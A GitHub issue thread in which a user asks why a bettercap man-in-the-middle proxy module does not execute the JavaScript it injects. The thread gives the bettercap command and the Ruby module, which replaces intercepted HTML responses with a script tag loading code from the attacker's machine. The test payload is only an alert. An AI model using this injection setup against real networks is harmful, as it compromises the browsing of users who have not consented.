### ISSUE TITLE
MITM injects html, but javascript doesn't execute?

### ISSUE THREAD

**Issue by jackendra** [evilsocket/bettercap-proxy-modules#12]
Bettercap does say it is "Injecting into ***"

The command I use is :
"bettercap --httpd --http-path=/root/Desktop/file.js --proxy --proxy-module=/root/Desktop/custom_inject.rb"
I checked with a few different devices and browsers, but even if it successfuly injects the code, it seems like the js file is not executed.

My JS file contains:
<script>alert("hello?");</script>

Am I doing anything wrong?

**Comment by evilsocket** [comment]
I have no idea what "custom_inject.rb" is, and i don't see your js. closing.

**Comment by jackendra** [comment]
My JS didnt show up because github removed it.
And the custom inject plugin is a plugin directly from your site its code is :
class InjectJS < Proxy::Module  
  def on_request( request, response )
    # is it a html page?
    if response.content_type =~ /^text\/html.*/
      Logger.info "Injecting javascript file into http://#{request.host}#{request.url} page"
      # get the local interface address and HTTPD port
      localaddr = Context.get.ifconfig[:ip_saddr]
      localport = Context.get.options[:httpd_port]
      # inject the js
      response.body = "<html><script src='http://#{localaddr}:#{localport}/file.js' type='text/javascript'></script></html>"
    end
  end
end

**Comment by jackendra** [comment]
And the javascript file just contains a starting scripting tag and ending tag.
Between that is a call to alert()
